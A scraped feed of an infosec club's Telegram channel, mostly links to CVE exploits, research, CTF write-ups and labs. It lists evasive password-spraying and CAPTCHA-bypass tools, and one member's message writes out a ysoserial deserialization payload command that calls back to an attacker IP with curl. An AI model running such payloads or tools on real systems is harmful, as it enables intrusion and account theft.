infosec_kpi_dev | Unsorted

Telegram-канал infosec_kpi_dev - infosec_kpi_dev

598

Клуб з інформаційної безпеки dcua-school https://bit.ly/dcua-school

Subscribe to a channel

infosec_kpi_dev

Сьогодні можна прийти офлайн

Читать полностью…

infosec_kpi_dev

Чпокъ https://github.com/mirchr/CVE-2025-32463-sudo-chwoot

Читать полностью…

infosec_kpi_dev

https://spectrum.ieee.org/unitree-robot-exploit

Читать полностью…

infosec_kpi_dev

https://github.com/K2SOsint/Legendary_OSINT

Читать полностью…

infosec_kpi_dev

😈 [ Aurélien Chalot @Defte_ ]

Dumping LSASS is old school. If an admin is connected on a server you are local admin on, just create a scheduled task asking for a certificate on his behalf, get the cert, get its privs. All automatized in the schtask_as module for NetExec 🥳🥳🥳

🐥 [ tweet ]

Читать полностью…

infosec_kpi_dev

Bypassing Cloudflare's Turnstile CAPTCHA With thermoptic
FlareSolverr Proxy server to bypass Cloudflare protection
#infosec #cybersecurity #bugbounty @reconcore

Читать полностью…

infosec_kpi_dev

https://github.com/microsoft/AI-Red-Teaming-Playground-Labs

Читать полностью…

infosec_kpi_dev

Хакер это от боженьки

Читать полностью…

infosec_kpi_dev

https://objective-see.org/blog/blog_0x81.html

Читать полностью…

infosec_kpi_dev

:( но це не так, або я не так обяснив. В мене вийшло підписання ysoserial потім mono-devel потім скрипт на python . І вже підписи проходять наче ну нова проблема обмеження 120 символів щось таке а тільки ysoserial генерує 5кб :) я впав в ступор

Читать полностью…

infosec_kpi_dev

https://specterops.io/blog/2025/07/24/escaping-the-confines-of-port-445-ntlm-relay/

Читать полностью…

infosec_kpi_dev

https://blog.sucuri.net/2025/07/uncovering-a-stealthy-wordpress-backdoor-in-mu-plugins.html

Читать полностью…

infosec_kpi_dev

Сисюрити ин екшон https://research.eye.security/sharepoint-under-siege/

Читать полностью…

infosec_kpi_dev

Ниет, есть исчо https://colab.research.google.com/github/satwikkansal/wtfpython/blob/master/irrelevant/wtf.ipynb

Читать полностью…

infosec_kpi_dev

🔑 Golden DMSA

Critical vulnerability in Windows Server 2025 allows attackers with KDS root key access to generate passwords for all dMSA/gMSA accounts forest-wide. New research reveals design flaw in ManagedPasswordId structure - only 1,024 possible combinations makes brute-force trivial.

🔗 Research:
https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/

🔗 Source:
https://github.com/Semperis/GoldenDMSA

#ad #windows #dmsa #kerberos #persistence

Читать полностью…

infosec_kpi_dev

https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-linux-sudo-flaw-exploited-in-attacks/

Читать полностью…

infosec_kpi_dev

#exploit
#Whitepaper
#Hardware_Security
"Breaking BMC: The Forgotten Key to the Kingdom",
NVIDIA Offensive Security Research, 2025.
]-> Ghost in the Controller: Abusing Supermicro BMC Firmware Verification
]-> Broken Trust: Fixed Supermicro BMC Bug Gains a New Life in Two New Vulnerabilities

// Analyzing Baseboard Management Controllers to Secure Data Center Infrastructure, PoCs for CVE-2024-54085, CVE-2024-10237, CVE-2025-7937, CVE-2025-6198

Читать полностью…

infosec_kpi_dev

FlareProx
Simple IP Rotation & URL Redirection via Cloudflare Workers, to avoid detection and blocks. It supports all HTTP methods (GET, POST, PUT, DELETE, etc.) and provides IP masking through Cloudflare's global network. 100k requests per day are free!

FireProx
AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.

CredMaster
Launch a password spray / brute force attach via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.

CredKing
Password spraying using AWS Lambda for IP rotation

OmniProx
A multi-cloud HTTP proxy manager that provides IP rotation and header manipulation capabilities across different cloud providers. It offers a unified interface for managing proxies on various cloud platforms.

#github #tool @reconcore

Читать полностью…

infosec_kpi_dev

Хакиры везде https://www.bleepingcomputer.com/news/security/dutch-teens-arrested-for-trying-to-spy-on-europol-for-russia/

Читать полностью…

infosec_kpi_dev

SQLi не только в веб https://www.rapid7.com/blog/post/cve-2025-10184-oneplus-oxygenos-telephony-provider-permission-bypass-not-fixed/

Читать полностью…

infosec_kpi_dev

Ахренеть https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/

Читать полностью…

infosec_kpi_dev

https://labs.cai.do/

Читать полностью…

infosec_kpi_dev

Binary Exploitation 101

https://r1ru.github.io/categories/binary-exploitation-101/

Читать полностью…

infosec_kpi_dev

Чи є якісь інші лаби, де можна подивитись на Cisco обладнання? Зайду кудись

Читать полностью…

infosec_kpi_dev

Привіт підскажить пліз як зробити підпис, і є PasswordKey: f3d9aa53-c08d-43
PasswordIV: 5ac8083e-8ff6-43
Генерую вот таким пайлодам ..\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o raw -c "curl 10.10.14.15 4444" Треба пдіписати та закодувати в base64 або може десь почитати?
Пс це десерілазаці .Net

Читать полностью…

infosec_kpi_dev

Xintra - .NET Crash Dump Analysis

https://0xsultan.github.io/dfir/Xintra-Crash-Dump-Analysis/

Читать полностью…

infosec_kpi_dev

https://blog.exploit.org/caster-legless/

Читать полностью…

infosec_kpi_dev

CVE-2025-53770: SharePoint RCE (ToolShell)

Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit

Patched: July 20, 2025

#rce #pentest #redteam #ad #sharepoint #cve

Читать полностью…

infosec_kpi_dev

https://fstrings.wtf/

Читать полностью…

infosec_kpi_dev

https://thesavageteddy.github.io/featured/codegate-finals-2025/

Читать полностью…
Subscribe to a channel